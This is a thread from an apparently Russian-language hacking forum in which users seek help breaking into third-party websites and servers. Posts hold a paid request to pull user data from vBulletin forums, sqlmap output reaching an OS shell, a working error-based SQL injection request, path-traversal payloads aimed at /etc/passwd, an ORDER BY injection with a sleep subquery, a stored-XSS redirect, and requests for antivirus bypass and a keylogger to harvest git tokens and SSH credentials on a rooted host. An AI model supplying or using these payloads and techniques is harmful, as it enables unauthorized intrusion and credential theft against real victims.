Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. TrueCryptoMan

    TrueCryptoMan New Member

    Joined:
    15 May 2023
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Подскажите , пожалуйста как выглядят users в админ панеле vbulletion
     
  2. TrueCryptoMan

    TrueCryptoMan New Member

    Joined:
    15 May 2023
    Messages:
    12
    Likes Received:
    2
    Reputations:
    1
    Нужен человек , который поможет крутить уязвимости vbulletion 3-4 версии.Нужен доступ к юзерам.Оплачивать за работу буду)
     
  3. Genius Black

    Genius Black New Member

    Joined:
    29 Jul 2015
    Messages:
    34
    Likes Received:
    4
    Reputations:
    0
    web server operating system: Linux Ubuntu
    web application technology: Nginx 1.18.0
    back-end DBMS: PostgreSQL
    [18:56:26] [INFO] fingerprinting the back-end DBMS operating system
    [18:56:26] [WARNING] reflective value(s) found and filtering out
    [18:56:29] [INFO] the back-end DBMS operating system is Linux
    [18:56:31] [INFO] testing if current user is DBA
    [18:56:34] [INFO] retrieved: '1'
    [18:56:36] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
    [18:56:37] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER

    "[18:56:36] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution"

    Что означает конректно эта строка? Я не совсем понимаю, вижу первый раз.
     
  4. barzini

    barzini Banned

    Joined:
    14 Apr 2018
    Messages:
    57
    Likes Received:
    105
    Reputations:
    0
    Можешь написать в лс. memberlist.php да много как. Тебе надо получить БД и все что есть с сервера? Логины, пароли и все остальное?
     
    #3004 barzini, 22 May 2023
    Last edited: 22 May 2023
  5. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    #3005 eminlayer7788, 28 Sep 2023
    Last edited: 29 Sep 2023
    b3 likes this.
  6. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    прикольная скул

    XPATH syntax error: '~8.0.34-0ubuntu0.20.04.1~'

    GET /company/search/-/2/en?l=18%22%25'+AND+extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))+AND+'asd'+LIKE+'%"asd&s=ffff
     
    #3006 b3, 28 Sep 2023
    Last edited: 29 Sep 2023
    eminlayer7788 likes this.
  7. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Всем привет. Разрабы говорят нужно для подтверждения дырки ls сделать и т.д
    Сканер выдал [CVE-2022-0735] [http] [critical] https://gitlab.site.ru/users/sign_in [токен бегуна]

    Пробую регистрировать

    Code:
    docker run -t --rm --name gitlab-runner-register -v ~/.gitlab-runner:/etc/gitlab-runner gitlab/gitlab-runner \
    register \
    --non-interactive \
    --executor="docker" \
    --docker-image alpine:latest \
    --url "https://gitlab.site.ru" \
    --registration-token "тот токен" \
    --description "A docker runner" \
    --tag-list "local-dev" \
    --run-untagged="true" \
    --locked="false"; 

    Выдает
    ERROR: Registering runner... forbidden (check registration token) runner=3cn7d6yg
    PANIC: Failed to register the runner.


    Таким образом можно удаленно подключится к gitlab-runner?
    Или нужно как то по другому?
     
  8. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Поделитесь линками на обходы АВ, в данный момент нужно обойти COMODO на win10
     
  9. swerk1337

    swerk1337 New Member

    Joined:
    28 Jun 2022
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, нашел xss на сайте, она хранимая, хочу сделать редирект на свой сайт, вот так
    <meta http-equiv="refresh" content="1;URL=https://mywebsite.com" />, редирект происходит но не на мой сайт, а на этот же, только на другую страницу и в браузере ссылка дополняется после самого сайта который я атакую добавляется еще вот так href=a, почему так может быть? Можно ли как то зашифровать ?
     
  10. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    ничего не понял но очень интересно, а было бы еще интересней если бы ты код показал который шлешь и потом как оно выглядит на странице в коде.
     
  11. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    Привет! Есть ресурс на php с подозрением на LFI

    Code:
    about/docs?page=2
    здесь адекватное поведение

    Code:
    about/docs?page=222222222222
    поведение на скрине

    При попытке задать стринг значение типа
    Code:
    about/docs?page=../../../../etc/passwd
    получаю ошибку
    Code:
    Unsupported operand types: string - int
    Я так понимаю, что фильтруются строковые. Каким путем можно обойти фильтрацию?
    Спасибо :)
     

    Attached Files:

  12. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    ..%2F..%2F..%2Fpasswd%00
    %c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
    %252e%252e%252fetc%252fpasswd%00
    /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
     
  13. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1

    Неа. Кидает либо 403 либо возвращает 200 с алертом
    Code:
    Unsupported operand types: string - int
    Буду тогда пробовать искать bypass методы. Спасибо за ответ!
     
  14. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    231
    Likes Received:
    601
    Reputations:
    145
    Это пагинация, скорее всего.
    Т.е. когда вывод не умещается на одной странице, его разбивают на несколько страниц и в переменной page указывают номер из этого списка страниц.

    LFI тут нет.
    Можно проверить SQLi, на случай, если это самописная пагинация, но вероятность маленькая.
     
  15. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    там еще и в добавок проверка типа, так что вероятность еще ниже, разве что может проверка логики может быть унылая, но это тоже редкость

    Code:
    └─$ php -r 'var_dump(is_numeric('0x272073716c20696e6a'));'
    bool(true)
    
     
    dooble likes this.
  16. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Добрый подскажите, возможно ли что то то сделать с данным выводом (sql-injection?)
    Сколько не пробовал и sqlmap'ом и тамперы и ручками что то никак(
    Или я настолько глуп... и тут не выкрутить :p:rolleyes:
    SQLSTATE[42S22]:
    Column not found: 1054
    Unknown column '-9'' in 'order clause' (SQL: select * from `oauth_access_tokens` where `user_id` = 3143647 and `revoked` = 0 and exists (select * from `oauth_clients` where `oauth_access_tokens`.`client_id` = `oauth_clients`.`id` and `personal_access_client` = 1) order by `-9'` desc limit 10 offset 0)
     
  17. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    231
    Likes Received:
    601
    Reputations:
    145
    Попробуй убрать ошибку, вместо -9' отправь
    Code:
    revoked`,1,`revoked
    если отработает нормально, то в сортировке можно использовать подзапрос, например
    Code:
    revoked`,(select(0)from(select(sleep(10)))v),`revoked
    А для sqlmap возможно придется указать префикс и суффикс.
     
  18. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Code:
    HTTP/2 500 Internal Server Error
    Date: Sun, 03 Mar 2024 06:22:53 GMT
    Content-Type: application/json
    Server: nginx/1.18.0
    X-Powered-By: PHP/8.1.13
    Cache-Control: no-cache, private
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, PATCH
    Access-Control-Allow-Credentials: true
    Access-Control-Max-Age: 86400
    Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With, Accept, Accept-Encoding, Accept-Language, Cache-Control, Connection, Host, Origin, Pragma, Referer, User-Agent, X-Powered-By, X-Anty-App-Version, baggage, sentry-trace, X-Content-Pragma, Access-Control-Request-Headers, content-type, Sec-Fetch-Dest, Sec-Fetch-Site, Sec-Fetch-Mode, TE, Content-Length
    
    {"success":false,"error":"SQLSTATE[42S22]: Column not found: 1054 Unknown column 'revoked`,1,`revoked' in 'order clause' (SQL: select * from `oauth_access_tokens` where `user_id` = 3143647 and `revoked` = 0 and exists (select * from `oauth_clients` where `oauth_access_tokens`.`client_id` = `oauth_clients`.`id` and `personal_access_client` = 1) order by `revoked``,1,``revoked` desc limit 25 offset 0)"}
     
  19. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Добрый, подскажите актуальные инструмент(ы), которые позволили бы "мониторить" все вводимое в терминал. aka кейлоггер на debian 12
    имеется доступ root, цель собрать все данные включая git token, данные parallel ssh и пр.